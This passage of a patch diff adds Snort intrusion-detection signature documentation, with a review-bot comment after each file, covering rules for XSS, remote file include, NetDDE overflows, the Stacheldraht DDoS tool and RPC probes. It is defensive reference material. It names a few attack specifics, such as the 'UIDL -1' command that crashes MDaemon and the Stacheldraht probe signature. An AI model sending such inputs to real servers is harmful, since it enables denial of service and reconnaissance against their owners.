+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
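Review bot: the only reference is the OpenNap specification, which suggests the rule matches Napster/OpenNap traffic, yet the text speaks only of "p2p clients" in general; name the protocol and the port or payload the rule keys on. For an informational event, "Ease of Attack: Simple." should be "Not applicable", as 1429.txt already does for its policy rule, and "False Positives: None known" should acknowledge that any other traffic on the same port or any sanctioned use of the client will fire the rule.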
--- /dev/null
+++ b/doc/signatures/100000785.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000785
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "forgot" parameter in the "password_reminder.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
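Review bot: the Impact section ("system integrity compromise", "unauthorized administrative access to the server", "execution of arbitrary code") is the remote-file-include boilerplate and overstates a cross site scripting bug; the realistic impact is script execution in a victim's browser, theft of session or credential data, and actions performed as that user, which is what the Attack Scenarios section already describes. The second Detailed Information paragraph about executing "system binaries" on the server is likewise unsupported for an XSS in the "forgot" parameter and should be removed. Affected Systems should list ATutor versions, not "All systems running CGI applications using ATutor".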
--- /dev/null
+++ b/doc/signatures/1375.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1375
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
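Review bot: The Affected Systems section is empty; fill it in (given the Summary's scope, "All systems using a web server", as the sibling web-server files in this patch put it) or state explicitly that it is not applicable. Also the typo "ona web server" in Detailed Information should read "on a web server".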
--- /dev/null
+++ b/doc/signatures/2370.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2370
+
+--
+Summary:
+This event is generated when an attempt is made to access config.conf, a 
+component of the BugPort PHP web application running on a server.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+BugPort is a PHP application used for bug tracking purposes. It is
+possible for a remote user to view the configuration file for the
+application by making a request for the file using a web browser.
+
+--
+Affected Systems:
+	BugPort prior to version 1.099
+
+--
+Attack Scenarios:
+An attacker can view the configuration file for the server by using a
+web browser to request the file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
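Review bot: Corrective Action is the generic "apply vendor patches" text even though Affected Systems already pins the fix to "BugPort prior to version 1.099"; say "Upgrade to BugPort 1.099 or later" so the reader gets the actionable version. Attack Scenarios says the attacker views "the configuration file for the server" while Summary and Detailed Information describe the application's own config.conf; make the two agree. Additional References is empty for a vulnerability in a specific named product; add the advisory or vendor reference if one is available.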
--- /dev/null
+++ b/doc/signatures/1339.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1339
+
+--
+Summary:
+Attempted chsh command access via web
+
+--
+Impact:
+Attempt to change a users shell on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change a users shell on a machine. Using this
+command an attackermay change the shell of a user to suit his own
+needs. By changingthe shell an attacker may further compromise a
+machine by specifyinga shell that could contain a Trojan Horse
+component or that couldcontain embedded commands specially crafted by
+anattacker.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chsh'
+in the URIwhich can then change the shell of a user present on the
+host.This commandmay also be requested on a command line should the
+attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin.Whenever possible,
+sensitive filesand certain areas of the filesystem should have the
+system immutableflag set to negate the use of the chsh command. On BSD
+derived systems,setting the systems runtime securelevel also prevents
+the securelevelfrom being changed. (note: the securelevel can only be 
+increased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+man chsh
+
+--
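Review bot: Detailed Information, Attack Scenarios and Corrective Action have words run together where line breaks were lost ("attackermay", "changingthe", "specifyinga", "couldcontain", "anattacker", "URIwhich", "host.This commandmay", "gainaccess", "ofit's", "cgi-bin.Whenever", "filesand", "immutableflag", "systems,setting", "securelevelfrom"); reinsert the spaces. "it's designated web root" should be "its". The file also lacks the Affected Systems section every other signature file carries. The last sentence of Corrective Action is circular ("setting the systems runtime securelevel also prevents the securelevel from being changed"); the point being made is that at a raised securelevel the immutable flag cannot be cleared, which is what makes the flag effective against chsh, so reword it to say that.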
--- /dev/null
+++ b/doc/signatures/1214.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1214
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
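Review bot: "attackers choosing" in Impact should be "attacker's choosing". Additional References is empty while the Summary claims "a known vulnerability"; if the rule targets a specific issue, cite it here, otherwise the Summary should not say so. Note that this file's text is boilerplate repeated verbatim in 1173.txt and 1584.txt later in this patch, so nothing here tells the reader what SID 1214 actually matches; a Summary sentence naming the request pattern would fix that.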
--- /dev/null
+++ b/doc/signatures/100000486.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000486
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PhpBlueDragon CMS" application running on a 
+webserver. Access to the file "template.php" using a remote file being passed 
+as the "vsDragonRootPath" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "vsDragonRootPath" parameter in the "template.php" 
+script used by the "PhpBlueDragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PhpBlueDragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
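Review bot: Missing blank lines before the "--" separators after the Sid value, after the Affected Systems entry and after the Contributors block; the rest of the file (and the template) puts one there. Summary: "may indicate that an exploitation attempt has been attempted" is redundant; "may indicate an exploitation attempt" suffices. Detailed Information: typo "ona web server", and the third paragraph about validating client credentials is the generic template text and does not describe a remote file include, so either drop it or tie it to the vsDragonRootPath parameter.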
--- /dev/null
+++ b/doc/signatures/2932.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
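Review bot: Impact ("...with system level privileges") and the first Corrective Action line ("Apply the appropriate vendor supplied patches") are missing their terminating periods; the rest of the file punctuates consistently.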
--- /dev/null
+++ b/doc/signatures/1004.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1004
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
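Review bot: Additional References is empty although the Summary claims "a known vulnerability" in IIS and Ease of Attack says "Many exploits exist"; either cite the vulnerability or make the Summary generic. "attackers choosing" in Impact should be "attacker's choosing".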
--- /dev/null
+++ b/doc/signatures/100000413.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000413
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
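Review bot: The file opens with two empty lines before "Rule:" and ends with a blank line after the final "--"; the other signature files start directly with "Rule:". Typo "ona web server" in Detailed Information, whose third paragraph is the generic credential-validation template text and does not match a remote file include via REX[INCLUDE_PATH]. Summary: "an exploitation attempt has been attempted" is redundant.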
--- /dev/null
+++ b/doc/signatures/2122.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2122
+
+--
+Summary:
+This event is generated when a remote user uses a negative argument in the UIDL command sent to port 110 on an internal server.  This may indicate an attempt to exploit a boundary checking vulnerability in the POP UIDL command in the Alt-N MDaemon mail server.
+
+--
+Impact:
+The service will crash when it attempts to process the command. The attacker must have a valid POP account on the mail server to attempt this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a boundary checking vulnerability in the UIDL command on the Alt-N MDaemon POP server. If an authenticated user sends the UIDL command with a negative argument to the POP server, the MDaemon service will crash when it attempts to process the command. Note that this exploit can only be attempted by an authenticated user with a valid IMAP account on the server.
+
+--
+Affected Systems:
+Any operating system that runs the following IMAP servers:
+  -Alt-N MDaemon 6.0.0
+  -Alt-N MDaemon 6.0.5
+  -Alt-N MDaemon 6.0.6
+  -Alt-N MDaemon 6.0.7
+
+
+--
+Attack Scenarios:
+An authenticated user can send a UIDL -1 command to the POP server, which will cause the service to crash.
+
+--
+Ease of Attack:
+Simple. Exploits and proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Alt-N MDaemon 6.5.0 or later.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7445
+http://www.securityfocus.com/bid/6053
+
+--
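Review bot: POP and IMAP are mixed up: Summary and Impact describe a POP UIDL vulnerability and "a valid POP account", but Detailed Information ends with "a valid IMAP account" and Affected Systems is headed "Any operating system that runs the following IMAP servers". UIDL is a POP3 command (the Summary itself names port 110), so change both IMAP mentions to POP. Also remove the extra blank line after the Affected Systems list (two before the "--"), and "Exploits and proof of concept exists" should be "exist".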
--- /dev/null
+++ b/doc/signatures/2766.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2766
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_columns_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
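Review bot: Template fill-in artifact in Detailed Information: the procedure name "drop_columns_from_flavor" sits on its own line and the next line begins ". This procedure is included in", leaving a stray line break before the period; join it into "vulnerability in the procedure drop_columns_from_flavor. This procedure is included in dbms_repcat." Affected Systems says "Oracle Oracle9i" (vendor name doubled). Several "-- " separator lines carry trailing whitespace, unlike the other files. Additional References is empty; cite the Oracle alert if one is available.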
--- /dev/null
+++ b/doc/signatures/1173.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1173
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
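Review bot: This file is word-for-word identical to 1214.txt above except for the Sid, including the empty Additional References; a reader comparing SIDs 1173 and 1214 cannot learn what distinguishes them. Add at least a Summary sentence naming the request pattern or vulnerability this rule matches, and fix "attackers choosing" in Impact.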
--- /dev/null
+++ b/doc/signatures/236.txt
@@ -0,0 +1,60 @@
+Rule:
+--
+Sid:
+236
+
+--
+Summary:
+This event is generated when a Stacheldraht handler probes for a Stacheldraht agent on the destination host.
+
+--
+Impact:
+Severe. This indicates that a Stacheldraht handler may exist on the source host and an agent may exist on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.A handler can discover if a particular host is a Stacheldraht agent by sending it an ICMP echo reply with an ICMP identification number of 668 and a string of "gesundheit!" in the payload.
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A handler may attempt to discover if the destination host is a Stacheldraht agent. A script named "gag" can be used to generate this communication for a defender or attacker to discover if a host is a Stacheldraht agent.
+
+--
+Ease of Attack:
+Simple.  The gag script is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS194
+
+--
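Review bot: Missing blank line between "Rule:" and the first "--" separator (every other file has it). In Detailed Information, "launch the attack.A handler" needs a space after the period.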
--- /dev/null
+++ b/doc/signatures/2038.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2038
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
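Review bot: "wether" in Summary and Impact should be "whether". The Summary describes what NSM is rather than what the event means; the other files open with "This event is generated when ...", so restate it along the lines of "This event is generated when a request for the status of a host is made to the Network Status Monitor (NSM) rpc service" and leave the protocol description to Detailed Information. "rpc" in Impact and Detailed Information versus "RPC" in Corrective Action is inconsistent capitalisation.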
--- /dev/null
+++ b/doc/signatures/2204.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2204
+
+--
+Summary:
+This event is generated when an attempt is made to access ezadmin.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 version 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezadmin.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezadmin.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
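Review bot: "Rule:  " on the first line carries trailing whitespace, and under Additional References the "Bugtraq" entry follows the heading without the blank line the other files leave. Corrective Action says vendor patch status is "not known"; if that is still the case at commit time say so explicitly, otherwise confirm whether a vendor fix exists before pointing readers only at a third-party script.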
--- /dev/null
+++ b/doc/signatures/577.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+577
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) bootparam is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port bootparam is using.  Attackers can also learn what versions of the bootparam protocol are accepted by bootparam.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as bootparam run.  The bootparam RPC service is used by some diskless workstations to query a server to discover the information required to boot.  The client will issue a bootparam whoami request to the server.  The server response will include the Network Information Systems (NIS) domain name.  If no authentication is used, an attacker can send a bootparam request.  The domain name provides valuable information that can be used to break into an NIS environment.  
+
+--
+Affected Systems:
+Any host running bootparam with no authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where bootparam runs.  This may be a precursor to accessing bootparam.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access bootparam, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for bootparam, not probes of the bootparam service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the bootparam service itself. An attacker may attempt to go directly to the bootparam port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0647
+
+Arachnids 
+http://www.whitehats.com/info/IDS16
+
+
+--
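Review bot: "Network Information Systems (NIS)" in Detailed Information should be "Network Information Service (NIS)". There are two blank lines before the final "--" (one too many), and the double spaces after sentence-ending periods throughout this file differ from the single spacing used in the other signature docs. The reference is labelled "CVE" but cites the candidate name CAN-1999-0647; accurate for the time, but all CAN entries were later renamed to CVE, so consider updating it.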
--- /dev/null
+++ b/doc/signatures/1584.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1584
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
